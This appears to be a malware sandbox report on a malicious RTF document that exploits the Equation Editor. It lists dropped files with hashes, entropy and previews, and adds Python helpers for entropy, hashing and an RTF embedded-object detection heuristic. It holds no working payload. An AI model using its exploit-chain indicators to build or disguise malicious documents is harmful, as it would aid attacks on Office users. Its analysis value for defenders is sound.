Preview: {\rtf1................{\*\lineFillHeight632699961 \;}.{\549664850?7.6_?`3084%_46]*?52[;?@?=+!^%?[?.?.1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[.14~9.?-#;'$,/=7!@'[[.30-2|8.:?)?%=[^8@|'<^+36.:].|;8..^+[*??/3.%7-6,%6._.??=(`.#$3-<%~8|.:?|&)...?84.@5|?;*'(_@.:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3..)@'.]?/.)[|/!%%)##&-;`'?4?].--9_=.!&%..~>,*?&7',#,..?|$!.'!.,.`_*=8_36_:%#?6%>.!`^3/`?*1@.&?8)`36:+[;.#?7`%.;$0&.!?@..--%6@<((`<.[+>*?;0+.7_?7]]`?%.:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=?.?4/97?.78]!2#.%?]=.&|8??&[*]7|%?.^??%]!?_-#>%%5?>|@=?.3`..3>58/?(8,2=?@|,.&?_?%;.4?4?@--?3&(..8.''5,~>~%-==/64|.4&%|3_.~~|@633)?.^8!767_&<%*>7.@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/.8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<..2*&|?[0#+).11%.-[9.:&|88<^>83?843)8&%/,[??<?1?(.'?/&4=0._.%0*<.+,]*)==]3?|`_.`.:|+*2`]2.&!332!!-%;.,!?=%6#(??9/:*&)<_#^|97*?+@?#?|)).?0:*6<:@0;|^?/8)?9&~:0(=6=,?[.4&/&1'`6$>?-7_??+%@5[&@`]<?.&*~??;]*<?~19?9[7!7!96;.#<>)#%'[;^>?!4?>.6?-@@<>6?+?@,`<*:<61?24/]5?

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013811273052389
Encrypted: false
SSDEEP: 12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 18BC6D34FABB00C1E30D98E8DAEC814A
SHA1: D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256: 862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512: 8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 256672
Entropy (8bit): 3.748947235455245
Encrypted: false
SSDEEP: 6144:Nq4GRwdiKr3UfoJzrtFPZcMRQml/qJ1sZh7ryvESig:Nq4GCiKQfoJvPOnmlCJ1oh7+vDh
MD5: 09386235B48255A0B5B5EE106428A9DD
SHA1: AAED31297121E1FCE8222D417EF8BC90471AF3DE
SHA-256: 5E78D2BAED8277AFF8D71F752F4CA00621B6B487A022A942383883A6791364D2
SHA-512: 760E43B96EA2D455B414ED9FBCEB6B4BA3CF264E9B86015327DB20E3F1ECFEB5210738C9543C26B0CA270FE92170932ADD452E9935CCD218A65FE76918BB3051
Malicious: false
Preview: ..U.U.L.G.m.c.R.j.Q.N.W.K.p.W.m.k.P.L.W.P.i.n.L.W.h.o. .=. .".k.A.f.z.N.C.K.j.K.G.n.L.B.P.f.e.s.k.S.W.L.K.n.G.c.e.".....A.K.L.a.n.i.e.b.i.U.L.K.b.n.G.B.i.L.K.r.u.m.L.B.W.G. .=. .".S.R.t.G.P.f.i.k.u.l.W.K.W.u.I.v.R.m.N.H.h.C.C.p.k.L.".....H.G.L.P.U.i.z.c.L.P.C.W.q.W.L.x.k.P.e.n.m.R.j.L.k.e. .=. .".W.P.m.c.L.o.T.K.d.U.N.b.L.K.k.L.K.v.W.K.R.N.W.l.T.p.".....i.h.d.j.U.C.o.K.K.A.e.W.v.f.f.G.I.o.q.K.L.G.A.G.A.d. .=. .".Z.e.h.N.e.x.L.g.i.k.C.W.m.W.C.B.l.e.R.z.l.e.x.c.h.B.".....i.W.C.c.P.W.Z.x.H.W.U.e.b.T.p.h.W.e.d.p.e.K.c.k.i.K. .=. .".f.P.d.P.h.W.c.c.h.e.l.R.W.h.K.G.N.U.W.W.e.k.A.r.U.K.".....c.d.K.o.O.p.k.J.o.G.W.K.N.x.Z.L.m.t.W.H.Q.t.W.e.e.m. .=. .".L.L.c.p.A.Z.G.m.l.G.W.Z.a.m.c.t.e.g.L.b.e.G.K.o.r.m.".....Z.L.z.p.L.W.h.G.f.d.b.m.L.G.W.P.G.q.t.d.R.u.W.L.U.a. .=. .".i.N.c.c.z.L.W.G.e.o.e.h.l.z.B.m.P.W.t.L.K.L.W.z.p.L.".....p.e.n.z.U.U.L.N.W.P.h.j.e.H.e.J.e.G.i.o.U.b.e.f.q.K. .=. .".e.f.W.h.z.S.O.t.O.W.u.L.W.m.H.P.R.n.A.Z.h.e.W.U.P.a.".....O.p.h.K.p.i.Z.o.l.A.U.L.f.q.i.O.z.U.c.b.i.L.K.W.k.c. .

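Two figures in these file records are worth being able to reproduce by hand. The Entropy (8bit) column is Shannon entropy over byte frequencies (0 to 8 bits per byte), which is what separates the near-empty Office scratch files (0.03) from a packed payload; and the EQNEDT32.EXE drop above is a UTF-16LE script whose modest entropy (3.75) is an artefact of every second byte being a NUL, not a sign of benign content. The Python below is an added triage helper, not part of the Joe Sandbox report: it computes the same 8-bit entropy, detects UTF-16LE text by BOM or by the NUL-high-byte pattern (and refuses a mostly-zero buffer that would otherwise pass that heuristic), and extracts the whole-line `name = "value"` string assignments that make up the obfuscated script. Both inputs are constructed: the script sample re-encodes the first two assignment lines visible in the preview above, and the 64-byte buffer (61 NULs plus three distinct bytes) is the byte mix that yields the 0.3473 entropy listed for the report's 64-byte powershell.exe drop; neither is the actual dropped file.

```python
import math
import re
from collections import Counter
from typing import Dict, Optional

UTF16LE_BOM = b"\xff\xfe"


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0): the report's 'Entropy (8bit)' figure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def decode_if_utf16le(data: bytes) -> Optional[str]:
    """Return the text if `data` looks like UTF-16LE, else None.

    Accepts a BOM, or a body whose high bytes are >=90% NUL *and* whose low bytes are
    >=90% printable ASCII; the second condition keeps sparse binary blobs from matching.
    """
    if data.startswith(UTF16LE_BOM):
        return data[2:].decode("utf-16-le", errors="replace")
    if len(data) >= 4 and len(data) % 2 == 0:
        low, high = data[0::2], data[1::2]
        printable = sum(1 for b in low if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
        if high.count(0) >= 0.9 * len(high) and printable >= 0.9 * len(low):
            return data.decode("utf-16-le", errors="replace")
    return None


# One `name = "literal"` per line; optional leading '$' so plain PowerShell variables match too.
ASSIGN_RE = re.compile(r'^\s*\$?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*"([^"]*)"\s*$', re.MULTILINE)


def string_assignments(text: str) -> Dict[str, str]:
    """Map variable name -> string literal for every whole-line string assignment."""
    return {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(text)}


def triage(data: bytes) -> dict:
    """Summarise a dropped file the way the report's file table does, plus decoded assignments."""
    text = decode_if_utf16le(data)
    return {
        "size": len(data),
        "entropy": round(shannon_entropy_8bit(data), 4),
        "utf16le_text": text is not None,
        "assignments": string_assignments(text) if text is not None else {},
    }


# Constructed sample 1: the first two assignments of the EQNEDT32.EXE drop's preview,
# re-encoded as UTF-16LE with BOM and CRLF line endings (not the actual dropped file).
SAMPLE_SCRIPT = (
    'UULGmcRjQNWKpWmkPLWPinLWho = "kAfzNCKjKGnLBPfeskSWLKnGce"\r\n'
    'AKLaniebiULKbnGBiLKrumLBWG = "SRtGPfikulWKWuIvRmNHhCCpkL"\r\n'
)
SAMPLE_UTF16 = UTF16LE_BOM + SAMPLE_SCRIPT.encode("utf-16-le")

# Constructed sample 2: 64 bytes, 61 of them NUL plus three distinct other bytes, the
# byte mix that gives the 0.3473 entropy the report lists for its 64-byte powershell.exe drop.
SAMPLE_SPARSE = b"@" + b"\x00" * 3 + b"e" + b"\x00" * 10 + b"\x01" + b"\x00" * 48

if __name__ == "__main__":
    for label, blob in (("utf16 script", SAMPLE_UTF16), ("sparse", SAMPLE_SPARSE)):
        print(label, triage(blob))
```

The assignment map is the starting point for deobfuscating this kind of dropper: once the string literals are keyed by variable name, the later lines that concatenate or decode them can be resolved without executing anything.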
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 134544
Entropy (8bit): 2.9989105127453892
Encrypted: false
SSDEEP: 768:SxZNfNMxUS1u40TiTKAvGNeni/m8xXZOm:oZNu6i0TiTKeYh/tTT
MD5: A01193C207CD2FE313F5CEDA3FD76B7A
SHA1: 62173798263F9D7310F3F5942668DEA29AA5A90F
SHA-256: 6E7BB9F3D39B5A50FA8FD08B066B0A92001BEAEAE96C9FCBFDB5BCFB9F0F6C20
SHA-512: 6B4344CC538B502EF1F6D3C9FAF2973096B40054A0648078FEF21F451FF61A11906E9BEF01DE80EA4EE032EC8C17877FCC9FB05493512DC210FDA7C5F62F3E22
Malicious: false
Preview: ....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n......................................... w. ..0.......)".A.l*w"........atQ.........l*w.........`tQ........0...../....j...........D...../j...........T...{./j.....*wd....O./j.......8....I./ ...h....Y..I./)".A

                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):66768
                                                                                                                                Entropy (8bit):2.9045642362096498
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:gQbwIVguebyln1oBJ7v4rPMPRDJWKf4kfeHHCCKlRFwiACs:gQb5Tebyl1ojvw4RlWKf41HHC/KiACs
                                                                                                                                MD5:7DC8E1999A1AF96FE63D5E493356A288
                                                                                                                                SHA1:705D5C1FFDF27BF31F6408A1F98FA01547375612
                                                                                                                                SHA-256:611408FC701324B9EE55DE35EF19AA58103007691865E3900EC6E03BDE70F0C9
                                                                                                                                SHA-512:9275DD7D20A0EC72C0E8F1291EEB2237E6464857B50D114E3F615CFC27199EB07256BA65DD04BFDD664EAEBCC50909370D0E42FC10DA8863C3D6413B54DBB622
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l...........k...................@.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):318964
                                                                                                                                Entropy (8bit):5.498202232475241
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:hxelS/aoQOP7D4mD3f5R81Zk6ZJE6GOolsvm8:hxelSL34mD3f5ReZdZJElOFm8
                                                                                                                                MD5:1E74425F96A5DDD00E5494225278C22A
                                                                                                                                SHA1:97D7ADC10C419F1EBF2B2754CDFEFD3371CD95B9
                                                                                                                                SHA-256:420C08455ABFF24376B505BC34EE9021A10C5BF5285D3FD038778409EC78B67C
                                                                                                                                SHA-512:E0232C415E1171AABA244152F0D4CDD8328E0EF051FC24CFD2B472199A0AE41A451401A3492C04A612A9ACD3407047047C8A170A4B2A68EB80B4B862B699EA1B
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l...............2...........@m..?... EMF........ .......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):213168
                                                                                                                                Entropy (8bit):2.988970416935335
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:oR4CEQoVghaqdV+9ccR9qyn6z0G1+/WQOyFBUXjM9G2j58ThJAbH92f2bcrjZd0R:l9tkQRmQzpr5Txp1
                                                                                                                                MD5:33B91CBFFE8E675C476B0BA3AFC61062
                                                                                                                                SHA1:447B4D09F2D65DBFB28462556A33A047394E8D97
                                                                                                                                SHA-256:C81DE0EEC367CC4FDDADC14B92EA89BE12C856ACD249D45F93FCD69A8D50FD79
                                                                                                                                SHA-512:3EBB6F881334115B52FC4F426A4F681B22645B967FA03BF367C43CD7BB078C74BBFB7F41ABBB6132429704CB6E338808468E607298B999B63C7D246DA03750F2
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l............................E...U.. EMF.....@..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d.......n......._.......n...|.......!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Rich Text Format data, version 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69247
                                                                                                                                Entropy (8bit):2.869208176365265
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:ZD+xsejlud5HY1ayCyu7OHAzlzjRYEX4Bo:ZGjE3qy7OglR9XWo
                                                                                                                                MD5:C9AC55D64A51738B57F065449C7E3911
                                                                                                                                SHA1:7B9DD5B4E76E99D711B0FE11582E6FF06D9CA830
                                                                                                                                SHA-256:8F76E86093D71F34C2E6F824984034185964F3D15C28DF1B61ADF5165FBB212E
                                                                                                                                SHA-512:6D78C5A5CFC7FA34942E87CEAE41D6E97DEBAA9469831FFBC4482C9FC1B531A171B1A12FE6FF3902B8919AEE94BDF619CD0B43DABA07166D9E47042A9EAF8E60
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                 • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc, Author: ditekSHen
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:{\rtf1................{\*\lineFillHeight632699961 \;}.{\549664850?7.6_?`3084%_46]*?52[;?@?=+!^%?[?.?.1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[.14~9.?-#;'$,/=7!@'[[.30-2|8.:?)?%=[^8@|'<^+36.:].|;8..^+[*??/3.%7-6,%6._.??=(`.#$3-<%~8|.:?|&)...?84.@5|?;*'(_@.:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3..)@'.]?/.)[|/!%%)##&-;`'?4?].--9_=.!&%..~>,*?&7',#,..?|$!.'!.,.`_*=8_36_:%#?6%>.!`^3/`?*1@.&?8)`36:+[;.#?7`%.;$0&.!?@..--%6@<((`<.[+>*?;0+.7_?7]]`?%.:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=?.?4/97?.78]!2#.%?]=.&|8??&[*]7|%?.^??%]!?_-#>%%5?>|@=?.3`..3>58/?(8,2=?@|,.&?_?%;.4?4?@--?3&(..8.''5,~>~%-==/64|.4&%|3_.~~|@633)?.^8!767_&<%*>7.@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/.8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<..2*&|?[0#+).11%.-[9.:&|88<^>83?843)8&%/,[??<?1?(.'?/&4=0._.%0*<.+,]*)==]3?|`_.`.:|+*2`]2.&!332!!-%;.,!?=%6#(??9/:*&)<_#^|97*?+@?#?|)).?0:*6<:@0;|^?/8)?9&~:0(=6=,?[.4&/&1'`6$>?-7_??+%@5[&@`]<?.&*~??;]*<?~19?9[7!7!96;.#<>)#%'[;^>?!4?>.6?-@@<>6?+?@,`<*:<61?24/]5?
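The Yara hit on this dropped RTF is given only by rule name and description, and the preview shows the shape it matched on: `{\rtf1` followed immediately by junk bytes instead of a control word (the 14336-byte "data" file listed further down carries the same junk text encoded as UTF-16LE). The Python below is an added example, not part of the Joe Sandbox report and not ditekSHen's rule logic: it reproduces the 8-bit Shannon entropy and the hash fields the report prints for each dropped file, and applies a heuristic that approximates the rule description (non-standard RTF header plus embedded-object control words). The control-word list, the header regex and the two sample inputs are this example's own constructions.

```python
"""Triage helpers for dropped-file listings like the one above.

Added example, not part of the sandbox report. Reproduces the per-file
'Entropy (8bit)' and digest fields, and approximates what the
INDICATOR_RTF_MalVer_Objects description says it looks for. The RTF
heuristic is this example's own assumption, not the real rule's condition.
"""
import hashlib
import math
import re
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), as listed under 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """MD5 / SHA1 / SHA-256 / SHA-512 in the upper-case hex form the report prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


# Assumed list of RTF control words that introduce embedded OLE objects; these
# are the usual carriers for Equation Editor (EQNEDT32.EXE) exploit payloads.
OBJECT_WORDS = (b"\\object", b"\\objdata", b"\\objupdate", b"\\objemb",
                b"\\objautlink", b"\\objclass", b"\\objhtml")

# A well-formed header is '{\rtf1' followed by a control word, whitespace or a
# group; anything else right after the version is treated as non-standard.
_NORMAL_HEADER = re.compile(rb"^\{\\rtf1(?=[\\ \r\n{])")


def rtf_triage(data: bytes) -> dict:
    """Return indicator flags; 'suspicious' is True only when the header is
    non-standard AND at least one embedded-object control word is present."""
    is_rtf = data.startswith(b"{\\rtf")
    normal_header = bool(_NORMAL_HEADER.match(data))
    objects = [w.decode() for w in OBJECT_WORDS if w in data]
    return {
        "is_rtf": is_rtf,
        "nonstandard_header": is_rtf and not normal_header,
        "object_words": objects,
        "suspicious": is_rtf and not normal_header and bool(objects),
    }


# Constructed samples (not the dropped files from the report): a benign RTF and
# one shaped like the preview above, '{\rtf1' then junk bytes, then an object group.
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\f0 Hello\\par}"
MALFORMED_RTF = (b"{\\rtf1" + b"\x00\xff\x7f~@#" * 4
                 + b"{\\object\\objupdate\\objdata 0105000002000000}}")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RTF), ("malformed", MALFORMED_RTF)):
        print(name, round(shannon_entropy_8bit(blob), 3), digests(blob)["MD5"], rtf_triage(blob))
```

Run it against a real dropped file by reading the file as bytes and passing it to `shannon_entropy_8bit`, `digests` and `rtf_triage`; the digests should reproduce the MD5/SHA values in the listing, and the entropy should match the report's value to a few decimal places. The header check is deliberately strict, so an RTF that merely omits `\ansi` is flagged only if it also carries an object control word.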
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Microsoft Corporation, Last Saved By: 91974, Name of Creating Application: Microsoft Excel, Last Printed: Mon Jul 15 16:30:47 2024, Create Time/Date: Mon Oct 21 12:03:58 1996, Last Saved Time/Date: Mon Sep 30 09:11:40 2024, Security: 0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1921536
                                                                                                                                Entropy (8bit):5.05688819390453
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:rHmzCJEfXMGrc6/WCmzHJEAD3DERnLRmF8DUc3W7C:r1KzrcF1xbARM8Q2
                                                                                                                                MD5:5DB1D62AF529EB8960278533B4729E08
                                                                                                                                SHA1:C528EAF441753FF9F67A15D4D91411D9BBD89D6E
                                                                                                                                SHA-256:2F261B4AA19EE278CD2040BB7B890B861669EDEA4D7E0589807E766F86FDE545
                                                                                                                                SHA-512:BCBD933D1ECAAFB8E46DB8902F34C5BBFE81773BBCC88DB9E65899AE089FF6331C728356DE3BC404649D8DF239FCB861E56DD1077B6A4EA217ED25541EDD9F69
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:......................>...............................................................................................................................................................~.......T........................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1024
                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14336
                                                                                                                                Entropy (8bit):3.6223284944722915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Tn9A5iLnyrnKrIeGpzBC5BhTDBRLZDo1m6/nht7zRhACQe:ruMTMuI/pzAfZbZDg/nhtfXAze
                                                                                                                                MD5:1F0073F5EE9C6453AC9F83F07D55701E
                                                                                                                                SHA1:8873F9FC905685E63DD2C23FCA0888A46B95EF41
                                                                                                                                SHA-256:1FC1209AC2532AEB3FF2E9B890881174B197EAD249F097E733AEE1EBF3ADE984
                                                                                                                                SHA-512:3E1B3F0ADCFD639FB480AEB16B718DC4D2D1A3ACB4133C5786A142D4FA8692E714E82551BF26305F60D44108011431722A42266EB72B714FB330C755D9ACF25F
                                                                                                                                Malicious:false
                                                                                                                                Preview:....................4.9.6.6.4.8.5.0.?.7...6._.?.`.3.0.8.4.%._.4.6.].*.?.5.2.[.;.?.@.?.=.+.!.^.%.?.[.?...?...1.^.<.].*.&.1.?._.%.8.?.;.&.?...:.^.(.9.$._.`.'.%.?.@.^.`.?.4.^.&.[...1.4.~.9...?.-.#.;.'.$.,./.=.7.!.@.'.[.[...3.0.-.2.|.8...:.?.).?.%.=.[.^.8.@.|.'.<.^.+.3.6...:.]...|.;.8.....^.+.[.*.?.?./.3...%.7.-.6.,.%.6..._...?.?.=.(.`...#.$.3.-.<.%.~.8.|...:.?.|.&.).......?.8.4...@.5.|.?.;.*.'.(._.@...:.[.:.;./.!.+.1.>.(.+.%./.=.1.:./.,.$.4...?.-.$.|.&.5.3.%.|.?.@.2.?.).1.!.3.....).@.'...].?./...).[.|./.!.%.%.).#.#.&.-.;.`.'.?.4.?.]...-.-.9._.=...!.&.%.....~.>.,.*.?.&.7.'.,.#.,.....?.|.$.!...'.!...,...`._.*.=.8._.3.6._.:.%.#.?.6.%.>...!.`.^.3./.`.?.*.1.@...&.?.8.).`.3.6.:.+.[.;...#.?.7.`.%...;.$.0.&...!.?.@.....-.-.%.6.@.<.(.(.`.<...[.+.>.*.?.;.0.+...7._.?.7.].].`.?.%...:.;.?.[.+.(.,.$.%.1.1.<.?.`.3.%.=.^.7.?._.@.'.=.[.?.?.<.=.@.).=.?...?.4./.9.7.?...7.8.].!.2.#...%.?.].=...&.|.8.?.?.&.[.*.].7.|.%.?...^.?.?.%.].!.?._.-.#.>.%.%.5.?.>.|.@.=.?...3.`.....3.>.5.8./.?.(.8.,.2.=.?.@.|.,...&.?._.
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1536
                                                                                                                                Entropy (8bit):2.8462879894458504
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:YXHH3HpkyKptyKpkyKptECbeT+dE/fd0Ivk2WWHsmXT7MTe2IXTesZSDMz:In3jK+KjKDrd8NvRsMXMHmyMz
                                                                                                                                MD5:8024A9B919C00968F5F9BBE6B6B6226B
                                                                                                                                SHA1:33A9B07B4709CAB429DB14CEA49A9B538305F51A
                                                                                                                                SHA-256:7CEB9E403F7C09773FC2646D85D42C6F97B0641B35BC74A2ACDBA6AF9AD7088E
                                                                                                                                SHA-512:CA97FF409D7F96DBB570C0FB03D21F0083A3349F72CBDF95EC04A70E9E868DC5D18BB5F8E43ADCAD068E6B003E5E2623C1D2F72785E9EC99F604E8DF03996579
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>...........................E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...5.4.=.5...5._.2.......................................................................................................................................................................................................t...v...x...z...~............................................................................................................................................................................................................................................................................................................................................................................................................d........gd........
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33900902, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21037056
                                                                                                                                Entropy (8bit):1.1388605313519755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:wO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:wOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                MD5:C9619103D10C1CEF6B300ECF46CCD877
                                                                                                                                SHA1:3AB806432707666EB4986BB5D49F07DF62D0B265
                                                                                                                                SHA-256:C46F6583CA233D346F75245D38F152B142100C464CA3D987E9CF3F95F0924DEF
                                                                                                                                SHA-512:F6F82130CDBFB449EA8CD32B4E66B93668141DE768368C90BF4B1E32DE80E52CA5EBA2A38FD2BC7A88720D4F4550826B8F06353A18312C2BCD220BDC71469810
                                                                                                                                Malicious:false
                                                                                                                                Preview:3...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
